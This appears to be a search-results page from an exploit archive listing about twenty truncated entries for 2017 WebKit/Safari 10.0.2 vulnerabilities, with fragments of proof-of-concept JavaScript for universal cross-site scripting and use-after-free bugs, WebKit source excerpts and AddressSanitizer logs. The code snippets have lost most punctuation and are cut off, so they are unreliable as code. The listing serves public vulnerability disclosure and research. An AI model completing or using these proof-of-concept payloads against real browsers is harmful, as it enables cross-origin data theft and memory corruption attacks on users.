33 matches found
Apple WebKit Safari 10.0.2(12602.3.12.0.1) - operationSpreadGeneric Universal Cross-Site Scripting
Apple WebKit Safari 10.0.212602.3.12.0.1 - operationSpreadGeneric Universal Cross-Site Scripting 'use strict'; function spreada return ...a; let arr = Object.create1, 2, 3, 4; for let i = 0; i f.onload = null; try spreadf.contentWindow; catch e e.constructor.constructor'alertlocation'; ; f.src =...
Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting
jsCallee // newTarget may be an InternalFunction if we were called from Reflect.construct. JSFunction targetFunction = jsDynamicCastnewTarget; if LIKELYtargetFunction ... return targetFunction-rareDatavm-createInternalFunctionAllocationStructureFromBasevm, prototype, baseClass; ... else ... retur...
WebKit: UXSS via operationSpreadGeneric
Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation. It seems that that optimization is not implemented to the release version of Safari yet...
WebKit ComposedTreeIterator::traverseNextInShadowTree Use-After-Free
WebKit: ComposedTreeIterator::traverseNextInShadowTree use-after-free CVE-2017-2466 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on a nightly version of WebKit. The PoC has also been observed to crash Safari 10.0.2 on Mac. PoC:...
Apple Webkit Named Property UXSS
Apple Webkit: UXSS by accessing a named property from an unloaded window CVE-2017-2367 The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function. static bool...
WebKit FormSubmission::create Use-After-Free
WebKit: use-after-free in FormSubmission::create CVE-2017-2460 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on a nightly version of WebKit. The PoC has also been observed to crash Safari 10.0.2 on Mac. Please note: This bug is subject to a 90 day...
Apple WebKit disconnectSubframes UXSS
Apple WebKit: UXSS via disconnectSubframes CVE-2017-2445 When an element is removed from a document, the function |disconnectSubframes| is called to detach its subframesiframe tag, object tag, etc.. Here is a snippet of |disconnectSubframes|. void disconnectSubframesContainerNode& root,...
Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free Exploit
Exploit for multiple platform in category dos / poc function eventhandler1 input.type = "foo"; function eventhandler2 input.selectionStart = 25; !-- ================================================================= ASAN log from WebKit nightly on Mac:...
Apple WebKit - ComposedTreeIterator::traverseNextInShadowTree Use-After-Free Exploit
Exploit for multiple platform in category dos / poc function go d.open = false; d.innerHTML = "foo"; d.open = true; foo !-- ================================================================= ASan log: ================================================================= ==570==ERROR: AddressSanitizer:...
WebKit: HTMLInputElement use-after-free (CVE-2017-2454)
There is a use-after-free security vulnerability related to how the HTMLInputElement is handled in WebKit. The vulnerability was confirmed on a nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac. PoC: function eventhandler1 input.type = "foo"; function eventhandler2...
WebKit: use-after-free in RenderLayer(CVE-2017-2455)
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the latest nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac. PoC and ASan log follow PoC: function go div.style.setProperty"-webkit-flow-into", "foo"; document.execCommand"fontSize",...
Apple WebKit 10.0.2(12602.3.12.0.1) - Frame::setDocument (1) Universal Cross-Site Scripting Exploit
Exploit for multiple platform in category dos / poc && newDocument ASSERT!newDocument || newDocument-frame == this; if mdoc && mdoc-pageCacheState != Document::InPageCache mdoc-prepareForDestruction; mdoc = newDocument.copyRef; ... The function |prepareForDestruction| only called when the cache...
Apple WebKit: UXSS via Frame::setDocument (1)(CVE-2017-2364)
void Frame::setDocumentRefPtr&& newDocument ASSERT!newDocument || newDocument-frame == this; if mdoc && mdoc-pageCacheState != Document::InPageCache mdoc-prepareForDestruction; mdoc = newDocument.copyRef; ... The function |prepareForDestruction| only called when the cache state is not...
Apple Webkit: UXSS by accessing a named property from an unloaded window (CVE-2017-2367)
The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function. static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetterJSDOMWindowProperties thisObject, Frame& frame, ExecState exec, PropertyName propertyName,...
Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window
Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window document auto& htmlDocument = downcastdocument; auto atomicPropertyName = propertyName.publicName; if atomicPropertyName && htmlDocument.hasWindowNamedItematomicPropertyName JSValue namedItem; if...
Apple WebKit - RenderLayer Use-After-Free
Apple WebKit - RenderLayer Use-After-Free function go div.style.setProperty"-webkit-flow-into", "foo"; document.execCommand"fontSize", false, 6; window.requestAnimationFramecb; h1.attachShadowmode: "open"; h1.replaceWith"foo"; function cb var a; //trigger garbage collector forvar i=0;i !--...
Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free
function go d.open = false; d.innerHTML = "foo"; d.open = true; foo !-- ================================================================= ASan log: ================================================================= ==570==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000065058 at pc...
Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting
&& newDocument ASSERT!newDocument || newDocument-frame == this; if mdoc && mdoc-pageCacheState != Document::InPageCache mdoc-prepareForDestruction; mdoc = newDocument.copyRef; ... The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame wi...
Apple WebKit - 'FormSubmission::create' Use-After-Free
function go object.name = "foo"; input.autofocus = true; output.appendChildinput; form.submit; function eventhandler forvar i=0;i a !-- ================================================================= Preliminary analysis: The bug is in FormSubmission::create. This function traverses the vector ...
Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting
frameOwners; if policy == RootAndDescendants if isroot frameOwners.appenddowncastroot; collectFrameOwnersframeOwners, root; // Must disable frame loading in the subtree so an unload handler cannot // insert more frames and create loaded frames in detached subtrees. SubframeLoadingDisabler...